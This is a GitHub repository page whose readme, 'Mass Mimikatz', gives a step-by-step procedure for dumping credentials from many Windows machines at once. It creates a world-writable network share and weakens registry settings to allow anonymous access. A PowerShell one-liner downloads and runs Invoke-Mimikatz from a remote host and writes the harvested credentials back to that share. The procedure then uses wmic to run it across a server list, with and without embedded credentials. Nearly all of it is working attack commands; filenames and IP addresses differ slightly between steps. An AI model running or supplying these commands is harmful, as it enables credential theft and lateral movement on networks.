Skip to content
Latest commit bbed903 @breakersall breakersall Update readme.md
..
Failed to load latest commit information.
massmimi_reg.rb add mass mimikatz stuff
powermeup.cmd make proper infoz and update cmd
readme.md Update readme.md

readme.md

Mass Mimikatz

  1. Make Share:
cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t
  1. Set registry keys (massmimi_reg.rb meterpreter script):
reg change HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ open
reg change HKLM\System\CurrentControlSet\Control\Lsa "EveryoneIncludesAnonymous" 1
  1. Change directory into new "open" directory

  2. Upload powershell script (powermeup.cmd):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1
  1. Upload clymb3r's Invoke-Mimikatz ps1 - Download from PowerSploit repo: source on github

  2. Upload mongoose: Downloads Page - Both regular and tiny versions work

  3. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on.

  4. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default

  5. Execute wmic:

wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"

9a. Execute wmic with creds:

wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"

clean up:

  1. kill mongoose process
  2. net share open /delete
  3. kill registry values
  4. delete "open" directory
Something went wrong with that request. Please try again.